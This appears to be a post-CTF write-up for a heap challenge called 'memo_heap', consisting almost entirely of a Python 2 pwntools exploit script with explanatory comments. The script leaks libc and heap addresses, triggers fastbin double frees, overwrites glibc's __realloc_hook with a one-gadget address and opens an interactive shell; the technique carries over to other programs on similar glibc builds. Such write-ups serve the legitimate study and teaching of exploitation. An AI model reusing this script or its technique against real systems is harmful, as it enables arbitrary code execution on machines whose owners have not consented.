Tags: fastbindup
Rating:
Exploit by h3rcul35 (post-CTF):
```
from pwn import *
# Launch the target binary locally and load the host's libc ELF.
# Only `__realloc_hook` is looked up through this ELF (see the symbols[]
# call further down); every other libc/heap offset in the script is a
# hard-coded literal, so the script is tied to one specific libc build.
p=process('memo_heap')
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
def send(input):
    """Send *input* to the target as one line, after str() conversion.

    Thin wrapper over ``p.sendline``; ``p`` is the module-level process.
    """
    line = str(input)
    p.sendline(line)
def sla(first, second):
    """Wait until *first* appears on the target's output, then send *second* as a line.

    Both arguments are passed through str() before use.
    """
    prompt, answer = str(first), str(second)
    p.sendlineafter(prompt, answer)
def ra(till):
    """Discard output up to and including *till*, then return the next full line.

    The returned line still carries its trailing newline (pwntools recvline
    behaviour); callers split it off themselves.
    """
    p.recvuntil(till)
    line = p.recvline()
    return line
def choice(num):
    """Answer the program's ``choice: `` menu prompt with *num*."""
    option = str(num)
    sla('choice: ', option)
def create(size, name=''):
    """Menu option 1: request a memo of *size* bytes.

    *name* is only sent (as the memo content) when it is not the empty
    string, so ``create(0)`` answers the size prompt and nothing else.
    """
    choice('1')
    sla('create? ', str(size))
    if name == '':
        return
    sla('memo: ', str(name))
def delete(index):
    """Menu option 4: free the memo stored at *index*."""
    steps = [('choice: ', '4'), ('delete: ', str(index))]
    for prompt, answer in steps:
        sla(prompt, answer)
def show(index):
    """Menu option 3: ask the program to print the memo at *index*.

    The echoed content is not consumed here; callers read it with ``ra``.
    """
    idx = str(index)
    choice('3')
    sla('show: ', idx)
def edit(index, data=''):
    """Menu option 2: edit the memo at *index*.

    *data* is sent only when it is not the empty string; ``edit(n)`` with no
    data just selects the memo and stops after the index prompt.
    """
    choice('2')
    sla('edit: ', str(index))
    if data == '':
        return
    sla('of memo: ', str(data))
# --- exploit driver ---
# Python 2 / pwntools script (print statements, str used as a byte buffer).
# Every call below is an interactive round-trip with the target process, so
# the statement order *is* the protocol; none of these lines can be reordered.
create(256,'A'*8)
create(0)
delete(0)
create(0)
show(0)
# show() echoes the memo content after 'Name: '.  Take the first line and
# right-pad it with NULs to 8 bytes so u64() can decode it as a pointer.
recv=ra('Name: ').split('\n')[0]
main_arena=u64(recv+"\x00"*(8-len(recv)))-88
# The -88, 0x3c2860 and 0x4647c literals are hard-coded for the author's libc
# build and will differ on any other build; only __realloc_hook is resolved
# from the ELF's symbol table.
libc_base=main_arena-0x3c2860
one_shot=libc_base+0x4647c
realloc_hook=libc_base+libc.symbols['__realloc_hook']
print "[+] Libc leaked. Base at "+hex(libc_base)
print "[+] Realloc hook address: "+hex(realloc_hook)
print "[+] One shot gadget is at "+hex(one_shot)
delete(1)
delete(0)
create(0)
show(0)
# Second leak via the same 'Name: ' echo.  Unlike the libc leak above this
# uses a fixed 2-byte pad, i.e. it assumes exactly 6 bytes were echoed
# (u64 needs exactly 8); a shorter echo would make u64() fail here.
heap_130=u64(ra('Name: ').split('\n')[0]+"\x00"*2)
heap_base=heap_130-0x130
print "[+] Heap leaked. Base at "+hex(heap_base)
# Allocate a 96-byte and a 16-byte memo, then free index 2 and index 0
# (the double free the next print announces).  edit(0) is called without
# data, so only the index prompt is answered.
create(96,'B'*3)
create(16,'C'*3)
create(0)
edit(0)
delete(2)
delete(0)
print "[+] Double free triggererd for size 16"
#a,b,a in free bin list(0x10). First use create(16,p64(metadata_chunk)) then create(16) twice.
#create(16,p64(malloc_hook)) now will give write access to meta data for 0x70 chunk and corrupt it.
#now edit the chunk of size 0x70 and write one_shot into it. And call realloc (edit)
# NOTE(review): the comment above names malloc_hook, but the code at this step
# writes heap_base+0x50 and the hook actually targeted later is __realloc_hook.
# heap_base+0x130 is exactly heap_130, the pointer leaked above.
create(16,p64(heap_base+0x130))
create(16,'D'*3)
create(16,p64(heap_base+0x50)+p32(0)+p32(1))
print "[+] Fast bin dup done for size 16"
# Same pattern repeated for the 96-byte memos: free, reallocate, edit(1)
# without data, then free index 0 and index 1 again.
delete(0)
delete(2)
delete(3)
create(96,'E'*3)
edit(1)
delete(0)
delete(1)
print "[+] Double free triggered for size 96"
# The first 96-byte allocation after the double free is filled with two copies
# of realloc_hook-0x13 (the -0x13 is a literal chosen by the author; its
# derivation is not shown on this page).
create(96,p64(realloc_hook-0x13)*2)
create(96,'a'*3)
create(96,'b'*3)
# Final payload: 3 NUL bytes, then (one_shot, 0) twice.
pay='\x00'*3+(p64(one_shot)+p64(0))*2
create(96,pay)
print "[+] Fast bin dup done for size 96"
print "[+] Overwrote __realloc_hook with magic gadget"
# Per the author's comment above, edit() is the path that reaches realloc;
# it is called here without data to trigger the overwritten hook, then the
# script hands the session to the user.
edit(1)
p.interactive()